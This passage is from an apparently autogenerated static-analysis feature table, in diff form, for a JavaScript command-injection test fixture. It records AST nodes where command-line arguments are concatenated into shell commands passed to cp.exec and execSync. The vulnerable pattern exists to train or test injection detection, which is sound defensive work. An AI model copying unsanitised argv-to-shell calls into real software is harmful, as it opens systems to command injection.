contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | exceptional return of cp.exec ... rgv[0]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | exceptional return of cp.exec ... rgv[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | exceptional return of cp.exec ... rgv[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:2:5:25 | exceptional return of cp.exec ... rgv[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:5:5:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:5:5:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:5:5:8 | exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:5:5:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:5:5:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:16 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:16 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:16 | process | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:16 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:16 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:21 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:21 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:21 | process.argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:21 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:21 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:10:5:24 | process.argv[0] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:18:5:21 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:18:5:21 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:18:5:21 | argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:18:5:21 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:18:5:21 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:23:5:23 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:23:5:23 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:23:5:23 | 0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:23:5:23 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:5:23:5:23 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:8 | cp.exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | cp.exec ... rgv[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | cp.exec ... rgv[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | cp.exec ... rgv[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | cp.exec ... rgv[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | cp.exec ... rgv[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | exceptional return of cp.exec ... rgv[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | exceptional return of cp.exec ... rgv[0]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | exceptional return of cp.exec ... rgv[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | exceptional return of cp.exec ... rgv[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:2:6:37 | exceptional return of cp.exec ... rgv[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:5:6:8 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:5:6:8 | exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:5:6:8 | exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:5:6:8 | exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:5:6:8 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:18 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:18 | "cmd.sh " | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:18 | "cmd.sh " | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:18 | "cmd.sh " | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:18 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:18 | "cmd.sh " | stringConcatenatedWith | -endpoint- process.argv.0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:10:6:36 | "cmd.sh ... argv[0] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:28 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:28 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:28 | process | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:28 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:28 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:33 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:33 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:33 | process.argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:33 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:33 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:36 | process.argv[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:36 | process.argv[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:36 | process.argv[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:36 | process.argv[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:36 | process.argv[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:22:6:36 | process.argv[0] | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:30:6:33 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:30:6:33 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:30:6:33 | argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:30:6:33 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:30:6:33 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:35:6:35 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:35:6:35 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:35:6:35 | 0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:35:6:35 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:6:35:6:35 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:8 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:8 | cp.exec | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:8 | cp.exec | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:8 | cp.exec | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:8 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | cp.exec ... rgv[1]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | cp.exec ... rgv[1]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | cp.exec ... rgv[1]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:7:2:7:37 | cp.exec ... rgv[1]) | enclosingFunctionName | | +| 